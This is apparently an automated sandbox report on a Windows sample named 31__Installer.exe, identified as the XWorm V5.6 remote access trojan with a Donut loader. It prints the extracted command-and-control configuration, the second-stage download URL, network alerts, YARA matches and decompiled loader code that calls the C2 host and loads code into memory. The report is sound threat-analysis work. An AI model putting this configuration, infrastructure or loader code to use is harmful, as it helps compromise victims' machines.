Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
31__Installer.exe

Overview

General Information

Sample name:31__Installer.exe
Analysis ID:1466311
MD5:cc1bb6a11aa1706bcbc42f04d1b1d865
SHA1:b4555a73799aa255c431c227db3958e6286d6977
SHA256:96d3ad9b885e0a57a37a84582d6a681f98d5e71b11e952082a7b610026198b00
Tags:exe
Infos:

Detection

XWorm
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Snort IDS alert for network traffic
Yara detected XWorm
.NET source code contains method to dynamically call methods (often used by packers)
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Machine Learning detection for sample
Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
Sample uses string decryption to hide its real strings
Uses known network protocols on non-standard ports
AV process strings found (often used to terminate AV products)
Abnormal high CPU Usage
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to dynamically determine API calls
Contains functionality to query CPU information (cpuid)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found potential string decryption / allocating functions
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • 31__Installer.exe (PID: 7148 cmdline: "C:\Users\user\Desktop\31__Installer.exe" MD5: CC1BB6A11AA1706BCBC42F04D1B1D865)
  • cleanup
{"C2 url": ["156.238.235.31"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
SourceRuleDescriptionAuthorStrings
dump.pcapWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0x1207d:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
SourceRuleDescriptionAuthorStrings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\31[1].ccpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0xff91:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
C:\Users\Public\Downloads\ind.jpgWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0xff91:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
SourceRuleDescriptionAuthorStrings
00000000.00000002.3819296755.0000000002F90000.00000040.00001000.00020000.00000000.sdmpWindows_Trojan_Donutloader_f40e3759unknownunknown
  • 0xff91:$x86: 04 75 EE 89 31 F0 FF 46 04 33 C0 EB
00000000.00000002.3820992471.0000000005450000.00000004.08000000.00040000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
    00000000.00000002.3820992471.0000000005450000.00000004.08000000.00040000.00000000.sdmpMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
    • 0x6c80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
    • 0x6d1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
    • 0x6e32:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
    • 0x6af2:$cnc4: POST / HTTP/1.1
    00000000.00000002.3819907463.00000000031E1000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_XWormYara detected XWormJoe Security
      Process Memory Space: 31__Installer.exe PID: 7148JoeSecurity_XWormYara detected XWormJoe Security
        SourceRuleDescriptionAuthorStrings
        0.2.31__Installer.exe.5450000.1.raw.unpackJoeSecurity_XWormYara detected XWormJoe Security
          0.2.31__Installer.exe.5450000.1.raw.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
          • 0x6c80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
          • 0x6d1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
          • 0x6e32:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
          • 0x6af2:$cnc4: POST / HTTP/1.1
          0.2.31__Installer.exe.5450000.1.unpackJoeSecurity_XWormYara detected XWormJoe Security
            0.2.31__Installer.exe.5450000.1.unpackMALWARE_Win_AsyncRATDetects AsyncRATditekSHen
            • 0x4e80:$cnc1: Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:66.0) Gecko/20100101 Firefox/66.0
            • 0x4f1d:$cnc2: Mozilla/5.0 (iPhone; CPU iPhone OS 11_4_1 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/11.0 Mobile/15E148 Safari/604.1
            • 0x5032:$cnc3: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36
            • 0x4cf2:$cnc4: POST / HTTP/1.1
            No Sigma rule has matched
            Timestamp:07/02/24-19:26:55.721304
            SID:2852874
            Source Port:7000
            Destination Port:49706
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-19:27:04.946686
            SID:2852870
            Source Port:7000
            Destination Port:49706
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-19:23:17.813584
            SID:2855924
            Source Port:49706
            Destination Port:7000
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-19:27:04.947576
            SID:2852923
            Source Port:49706
            Destination Port:7000
            Protocol:TCP
            Classtype:A Network Trojan was detected
            Timestamp:07/02/24-19:24:43.950928
            SID:2853193
            Source Port:49706
            Destination Port:7000
            Protocol:TCP
            Classtype:A Network Trojan was detected

            Click to jump to signature section

            Show All Signature Results

            AV Detection

            barindex
            Source: http://guanlix.cn:881/31.ccpAvira URL Cloud: Label: malware
            Source: 00000000.00000002.3819907463.00000000031E1000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["156.238.235.31"], "Port": "7000", "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V5.6"}
            Source: 31__Installer.exeReversingLabs: Detection: 21%
            Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
            Source: 31__Installer.exeJoe Sandbox ML: detected
            Source: 0.2.31__Installer.exe.5450000.1.raw.unpackString decryptor: 156.238.235.31
            Source: 0.2.31__Installer.exe.5450000.1.raw.unpackString decryptor: 7000
            Source: 0.2.31__Installer.exe.5450000.1.raw.unpackString decryptor: <123456789>
            Source: 0.2.31__Installer.exe.5450000.1.raw.unpackString decryptor: <Xwormmm>
            Source: 0.2.31__Installer.exe.5450000.1.raw.unpackString decryptor: XWorm V5.6
            Source: 0.2.31__Installer.exe.5450000.1.raw.unpackString decryptor: USB.exe
            Source: 31__Installer.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: 31__Installer.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

            Networking

            barindex
            Source: TrafficSnort IDS: 2855924 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.8:49706 -> 156.238.235.31:7000
            Source: TrafficSnort IDS: 2852870 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes 156.238.235.31:7000 -> 192.168.2.8:49706
            Source: TrafficSnort IDS: 2852923 ETPRO TROJAN Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client) 192.168.2.8:49706 -> 156.238.235.31:7000
            Source: TrafficSnort IDS: 2852874 ETPRO TROJAN Win32/XWorm CnC PING Command Inbound M2 156.238.235.31:7000 -> 192.168.2.8:49706
            Source: TrafficSnort IDS: 2853193 ETPRO TROJAN Win32/XWorm V3 CnC Command - PING Outbound 192.168.2.8:49706 -> 156.238.235.31:7000
            Source: Malware configuration extractorURLs: 156.238.235.31
            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 881
            Source: unknownNetwork traffic detected: HTTP traffic on port 881 -> 49705
            Source: global trafficTCP traffic: 192.168.2.8:49705 -> 91.208.240.157:881
            Source: global trafficTCP traffic: 192.168.2.8:49706 -> 156.238.235.31:7000
            Source: Joe Sandbox ViewASN Name: XHOSTSERVERUS XHOSTSERVERUS
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: unknownTCP traffic detected without corresponding DNS query: 156.238.235.31
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: 0_2_003E25AD __EH_prolog,InternetReadFile,0_2_003E25AD
            Source: global trafficHTTP traffic detected: GET /31.ccp HTTP/1.1User-Agent: DownloadHost: guanlix.cn:881Cache-Control: no-cache
            Source: global trafficDNS traffic detected: DNS query: guanlix.cn
            Source: global trafficDNS traffic detected: DNS query: 56.126.166.20.in-addr.arpa
            Source: 31__Installer.exeString found in binary or memory: http://guanlix.cn:881/31.ccp
            Source: 31__Installer.exe, 00000000.00000003.1678316988.000000000097E000.00000004.00000020.00020000.00000000.sdmp, 31__Installer.exe, 00000000.00000002.3816556651.000000000097E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://guanlix.cn:881/31.ccpG
            Source: 31__Installer.exe, 00000000.00000002.3819907463.00000000031E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name

            System Summary

            barindex
            Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: 0.2.31__Installer.exe.5450000.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 0.2.31__Installer.exe.5450000.1.unpack, type: UNPACKEDPEMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: 00000000.00000002.3819296755.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: 00000000.00000002.3820992471.0000000005450000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects AsyncRAT Author: ditekSHen
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\31[1].ccp, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: C:\Users\Public\Downloads\ind.jpg, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 Author: unknown
            Source: C:\Users\user\Desktop\31__Installer.exeProcess Stats: CPU usage > 49%
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: 0_2_003F000E0_2_003F000E
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: 0_2_003F5A2A0_2_003F5A2A
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: 0_2_003EFB790_2_003EFB79
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: 0_2_003F0B660_2_003F0B66
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: 0_2_003F03AC0_2_003F03AC
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: 0_2_003F738F0_2_003F738F
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: 0_2_003F54D90_2_003F54D9
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: 0_2_003F66570_2_003F6657
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: 0_2_003F077E0_2_003F077E
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: 0_2_003F5F7B0_2_003F5F7B
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: 0_2_003F7F4F0_2_003F7F4F
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: 0_2_054655D80_2_054655D8
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: 0_2_0546B4080_2_0546B408
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: 0_2_0546A6B80_2_0546A6B8
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: 0_2_05464D080_2_05464D08
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: 0_2_0546ED840_2_0546ED84
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: 0_2_054607A00_2_054607A0
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: 0_2_054649C00_2_054649C0
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: String function: 003EA940 appears 45 times
            Source: 31__Installer.exe, 00000000.00000002.3820992471.0000000005450000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameXClient.exe4 vs 31__Installer.exe
            Source: 31__Installer.exe, 00000000.00000002.3815908367.0000000000403000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamewindos.exe. vs 31__Installer.exe
            Source: 31__Installer.exeBinary or memory string: OriginalFilenamewindos.exe. vs 31__Installer.exe
            Source: 31__Installer.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
            Source: dump.pcap, type: PCAPMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: 0.2.31__Installer.exe.5450000.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 0.2.31__Installer.exe.5450000.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: 00000000.00000002.3819296755.0000000002F90000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: 00000000.00000002.3820992471.0000000005450000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_AsyncRAT author = ditekSHen, description = Detects AsyncRAT
            Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\31[1].ccp, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: C:\Users\Public\Downloads\ind.jpg, type: DROPPEDMatched rule: Windows_Trojan_Donutloader_f40e3759 os = windows, severity = x86, creation_date = 2021-09-15, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Donutloader, fingerprint = 6400b34f762cebb4f91a8d24c5fce647e069a971fb3ec923a63aa98c8cfffab7, id = f40e3759-2531-4e21-946a-fb55104814c0, last_modified = 2022-01-13
            Source: 0.2.31__Installer.exe.5450000.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.31__Installer.exe.5450000.1.raw.unpack, Helper.csCryptographic APIs: 'TransformFinalBlock'
            Source: 0.2.31__Installer.exe.5450000.1.raw.unpack, AlgorithmAES.csCryptographic APIs: 'TransformFinalBlock'
            Source: classification engineClassification label: mal100.troj.evad.winEXE@1/2@2/2
            Source: C:\Users\user\Desktop\31__Installer.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\31[1].ccpJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeMutant created: NULL
            Source: C:\Users\user\Desktop\31__Installer.exeMutant created: \Sessions\1\BaseNamedObjects\DMTpmF9DC6Wmoh6u
            Source: 31__Installer.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\31__Installer.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: 31__Installer.exeReversingLabs: Detection: 21%
            Source: C:\Users\user\Desktop\31__Installer.exeSection loaded: apphelp.dllJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeSection loaded: wininet.dllJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeSection loaded: iertutil.dllJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeSection loaded: sspicli.dllJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeSection loaded: windows.storage.dllJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeSection loaded: wldp.dllJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeSection loaded: profapi.dllJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeSection loaded: kernel.appcore.dllJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeSection loaded: winhttp.dllJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeSection loaded: iphlpapi.dllJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeSection loaded: mswsock.dllJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeSection loaded: winnsi.dllJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeSection loaded: urlmon.dllJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeSection loaded: srvcli.dllJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeSection loaded: netutils.dllJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeSection loaded: dnsapi.dllJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeSection loaded: rasadhlp.dllJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeSection loaded: fwpuclnt.dllJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeSection loaded: mscoree.dllJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeSection loaded: amsi.dllJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeSection loaded: cryptsp.dllJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeSection loaded: rsaenh.dllJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeSection loaded: cryptbase.dllJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeSection loaded: userenv.dllJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeSection loaded: version.dllJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeSection loaded: wbemcomn.dllJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeSection loaded: avicap32.dllJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeSection loaded: msvfw32.dllJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeSection loaded: winmm.dllJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
            Source: 31__Installer.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE
            Source: 31__Installer.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
            Source: 31__Installer.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
            Source: 31__Installer.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
            Source: 31__Installer.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
            Source: 31__Installer.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

            Data Obfuscation

            barindex
            Source: 0.2.31__Installer.exe.5450000.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[5]{Settings.Host,Settings.Port,Settings.SPL,Settings.KEY,Helper.ID()}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 0.2.31__Installer.exe.5450000.1.raw.unpack, Messages.cs.Net Code: NewLateBinding.LateCall(obj, (Type)null, "Invoke", new object[2]{null,new object[2]{Pack[2],Helper.Decompress(Convert.FromBase64String(Pack[3]))}}, (string[])null, (Type[])null, (bool[])null, true)
            Source: 0.2.31__Installer.exe.5450000.1.raw.unpack, Messages.cs.Net Code: Plugin System.AppDomain.Load(byte[])
            Source: 0.2.31__Installer.exe.5450000.1.raw.unpack, Messages.cs.Net Code: Memory System.AppDomain.Load(byte[])
            Source: 0.2.31__Installer.exe.5450000.1.raw.unpack, Messages.cs.Net Code: Memory
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: 0_2_003F40E4 LoadLibraryW,GetProcAddress,GetProcAddress,EncodePointer,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_003F40E4
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: 0_2_003E4948 push eax; ret 0_2_003E4966
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: 0_2_003EA985 push ecx; ret 0_2_003EA998
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: 0_2_003E6649 push ecx; ret 0_2_003E665C
            Source: C:\Users\user\Desktop\31__Installer.exeCode function: 0_2_05466B88 pushad ; ret 0_2_05466B89

            Hooking and other Techniques for Hiding and Protection

            barindex
            Source: unknownNetwork traffic detected: HTTP traffic on port 49705 -> 881
            Source: unknownNetwork traffic detected: HTTP traffic on port 881 -> 49705
            Source: C:\Users\user\Desktop\31__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Users\user\Desktop\31__Installer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
